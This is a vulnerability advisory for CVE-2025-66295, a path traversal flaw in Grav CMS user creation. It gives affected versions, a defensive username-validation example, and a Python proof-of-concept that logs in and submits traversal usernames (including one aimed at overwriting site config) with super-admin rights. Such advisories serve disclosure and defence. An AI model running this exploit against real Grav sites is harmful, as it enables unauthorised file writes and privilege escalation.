Security Vulnerability Report
CVE-2025-66295 CVSS 8.8 HIGH

CVE-2025-66295

Published: 2025-12-01 21:15:53
Last Modified: 2025-12-04 18:34:22

Description

Grav is a file-based Web platform. Prior to 1.8.0-beta.27, when a user who holds the user-creation privilege creates a new user through the Admin UI and supplies a username containing path traversal sequences (for example ..\Nijat or ../Nijat), Grav writes the account YAML file to an unintended path outside user/accounts/. The written YAML can contain account fields such as email, fullname, twofa_secret, and hashed_password. This vulnerability is fixed in 1.8.0-beta.27.
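The defensive side of the description above, as an added example that is not Grav's code: a user-creation handler should reject a username before it ever becomes a filename, and independently confirm that the resolved account path stays inside the accounts directory. The accounts directory, the file naming and the allowed username character set are assumptions for illustration.

```python
import re
from pathlib import Path

# Assumed layout, taken from the advisory text: account YAML files live in user/accounts/
ACCOUNTS_DIR = Path("user/accounts").resolve()
# Assumed allow-list: no dots, slashes or backslashes, so '../Nijat' and '..\Nijat'
# are rejected before any path is built
USERNAME_RE = re.compile(r"[A-Za-z0-9_-]{3,32}")


class InvalidUsername(ValueError):
    """Raised when a username fails either check."""


def is_contained(username: str, accounts_dir: Path = ACCOUNTS_DIR) -> bool:
    """Containment check: the resolved target must be a direct child of accounts_dir.

    This catches '../' traversal on any host, but on POSIX a backslash is an ordinary
    filename character, so '..\\Nijat' passes here; that is why the allow-list on the
    raw username runs first and is not optional.
    """
    target = (accounts_dir / f"{username}.yaml").resolve()
    return target.parent == accounts_dir


def account_file_for(username: str, accounts_dir: Path = ACCOUNTS_DIR) -> Path:
    """Return the path the account YAML may be written to, or raise InvalidUsername."""
    if not USERNAME_RE.fullmatch(username):
        raise InvalidUsername(f"username {username!r} contains disallowed characters")
    if not is_contained(username, accounts_dir):
        raise InvalidUsername(f"username {username!r} resolves outside {accounts_dir}")
    return accounts_dir / f"{username}.yaml"


def is_safe_username(username: str) -> bool:
    try:
        account_file_for(username)
        return True
    except InvalidUsername:
        return False


if __name__ == "__main__":
    # Constructed inputs: the advisory's two traversal samples, a deeper one, and a normal name
    for name in ("nijat", "../Nijat", "..\\Nijat", "../../../config/site"):
        verdict = "accepted" if is_safe_username(name) else "rejected"
        print(f"{name!r:>26}  {verdict}")
```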

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Weakness: CWE-22 (Path Traversal)

Configurations (Affected Products)

cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:* (versions from 1.7.49.5 up to, but excluding, 1.8.0) - VULNERABLE
cpe:2.3:a:getgrav:grav:1.8.0:beta1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:getgrav:grav:1.8.0:beta10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:getgrav:grav:1.8.0:beta11:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:getgrav:grav:1.8.0:beta12:*:*:*:*:*:* - VULNERABLE
(The NVD configuration data also lists 1.8.0 beta2 through beta9 and beta13 through beta26 as vulnerable.)
Grav CMS < 1.8.0-beta.27

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-66295 PoC - Path Traversal in Grav Admin UI User Creation
# This PoC demonstrates how an authenticated user with user creation privileges
# can exploit the path traversal vulnerability to write files outside user/accounts/
import requests
import json

TARGET_URL = "http://target-grav-site.com"
LOGIN_URL = f"{TARGET_URL}/admin"
USER_CREATE_URL = f"{TARGET_URL}/admin/api/user"

# Authentication credentials (low-privilege user with user creation rights)
AUTH = {
    "username": "attacker",
    "password": "attacker_password"
}


def exploit():
    """Exploit path traversal in user creation to write arbitrary YAML file"""
    # Step 1: Login to Grav Admin
    session = requests.Session()
    login_response = session.post(LOGIN_URL, data=AUTH)
    if login_response.status_code != 200:
        print("[-] Login failed")
        return False
    print("[+] Login successful")

    # Step 2: Create user with path traversal payload
    # The username contains path traversal sequences to write outside user/accounts/
    path_traversal_usernames = [
        "../../Nijat",                 # Unix-style path traversal
        "..\\..\\Nijat",               # Windows-style path traversal
        "../../../config/site.yaml",   # Attempt to overwrite config
    ]

    for payload_username in path_traversal_usernames:
        user_data = {
            "username": payload_username,
            "email": "[email protected]",
            "fullname": "Path Traversal Attacker",
            "password": "hashed_password_value",
            "twofa_secret": "JBSWY3DPEHPK3PXP",
            "access": {
                "admin": {
                    "login": True,
                    "super": True
                }
            }
        }
        headers = {
            "Content-Type": "application/json",
            "X-Toolbar": "admin"
        }
        create_response = session.post(
            USER_CREATE_URL,
            data=json.dumps(user_data),
            headers=headers
        )
        if create_response.status_code in [200, 201]:
            print(f"[+] Successfully created user with path traversal: {payload_username}")
            print("[+] File written to unexpected location outside user/accounts/")
            return True
        else:
            print(f"[-] Failed with payload: {payload_username}")
    return False


if __name__ == "__main__":
    print("CVE-2025-66295 Exploitation Tool")
    print("Target: Grav CMS < 1.8.0-beta.27")
    exploit()
```

References
